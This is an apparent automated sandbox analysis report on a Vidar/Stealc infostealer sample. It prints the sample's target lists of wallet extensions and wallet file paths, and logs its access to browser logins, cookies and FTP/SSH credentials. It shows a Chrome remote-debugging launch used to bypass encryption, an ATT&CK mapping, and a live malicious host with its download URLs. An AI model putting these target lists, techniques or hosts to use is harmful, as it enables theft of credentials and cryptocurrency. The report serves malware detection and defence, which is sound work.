Tusk\|0\|fmhmiaejopepamlcjkncpgpdjichnecm\|1\|0\|0\|KeePassXC-Browser\|0\|oboonakemofpalcgghocfoadofidjkkk\|1\|0\|0\|Rise - Aptos Wallet\|1\|hbbgbephgojikajhfbomhlmmollphcad\|1\|0\|0\|Rainbow Wallet\|1\|opfgelmcmbiajamepnmloijbpoleiama\|1\|0\|0\|Nightly\|1\|fiikommddbeccaoicoejoniammnalkfa\|1\|0\|0\|Ecto Wallet\|1\|bgjogpoidejdemgoochpnkmdjpocgkha\|1\|0\|0\|Coinhub\|1\|jgaaimajipbpdogpdglhaphldakikgef\|1\|0\|0\|Leap Cosmos Wallet\|1\|fcfcfllfndlomdhbehjjcoimbgofdncg\|1\|0\|0\|MultiversX DeFi Wal
Source: file.exe, 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: ask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|Flash\|%DRIVE_REMOVABLE%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|
Source: file.exe, 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match	File source: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6520, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected Stealc

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2026579661.0000000000641000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6520, type: MEMORYSTR

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.0.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.64ecc0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2026579661.0000000000641000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6520, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4B0C40 sqlite3_bind_zeroblob,	0_2_6C4B0C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4B0D60 sqlite3_bind_parameter_name,	0_2_6C4B0D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3D8EA0 sqlite3_clear_bindings,	0_2_6C3D8EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4B0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C4B0B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3D6410 bind,WSAGetLastError,	0_2_6C3D6410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3DC030 sqlite3_bind_parameter_count,	0_2_6C3DC030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3D6070 PR_Listen,	0_2_6C3D6070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3DC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6C3DC050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3D60B0 listen,WSAGetLastError,	0_2_6C3D60B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3622D0 sqlite3_bind_blob,	0_2_6C3622D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3D63C0 PR_Bind,	0_2_6C3D63C0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Create Account	211 Process Injection	3 Obfuscated Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Masquerading	NTDS	56 System Information Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Virtualization/Sandbox Evasion	LSA Secrets	11 Query Registry	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	211 Process Injection	Cached Domain Credentials	151 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	12 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	66%	ReversingLabs	Win32.Infostealer.Tinba
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\delays.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label
https://b2een.xyz/msvcp140.dll2	100%	Avira URL Cloud	malware
https://b2een.xyz/freebl3.dll	100%	Avira URL Cloud	malware
https://b2een.xyz/softokn3.dll9	100%	Avira URL Cloud	malware
https://b2een.xyz/	100%	Avira URL Cloud	malware
https://b2een.xyz/softokn3.dll	100%	Avira URL Cloud	malware
https://b2een.xyzIECBKEGH	0%	Avira URL Cloud	safe
https://b2een.xyz/nss3.dll2	100%	Avira URL Cloud	malware
https://b2een.xyz/sqlo.dllb	100%	Avira URL Cloud	malware
https://b2een.xyz/M	100%	Avira URL Cloud	malware
https://b2een.xyz/vcruntime140.dll	100%	Avira URL Cloud	malware
https://b2een.xyz/nss3.dll	100%	Avira URL Cloud	malware
https://b2een.xyztosh;	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
chrome.cloudflare-dns.com	162.159.61.3	true	false	high
plus.l.google.com	142.250.181.110	true	false	high
t.me	149.154.167.99	true	false	high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	high
b2een.xyz	49.13.32.95	true	true	unknown
www.google.com	142.250.181.68	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
googlehosted.l.googleusercontent.com	172.217.19.225	true	false	high
clients2.googleusercontent.com	unknown	unknown	false	high
bzib.nelreports.net	unknown	unknown	false	high
ntp.msn.com	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://assets.msn.com/bundles/v1/edgeChromium/latest/common.070b7e2c0c11bf3433e5.js	false		high
https://c.msn.com/c.gif?rnd=1732530850447&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=c9ace0f4103f4a3e9851b1567c7f1f66&activityId=c9ace0f4103f4a3e9851b1567c7f1f66&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0	false		high
https://b2een.xyz/freebl3.dll	true	Avira URL Cloud: malware	unknown
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732530856083&w=0&anoncknm=app_anon&NoResponseBody=true	false		high
https://t.me/fu4chmo	false		high
https://c.msn.com/c.gif?rnd=1732530850447&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=c9ace0f4103f4a3e9851b1567c7f1f66&activityId=c9ace0f4103f4a3e9851b1567c7f1f66&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=BEDBCD4E4EB849C3A0914972165CB7CB&MUID=3B41451CF8CD6E141684505EF9E46F8C	false		high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732530857078&w=0&anoncknm=app_anon&NoResponseBody=true	false		high
https://b2een.xyz/softokn3.dll	true	Avira URL Cloud: malware	unknown
https://b2een.xyz/	true	Avira URL Cloud: malware	unknown
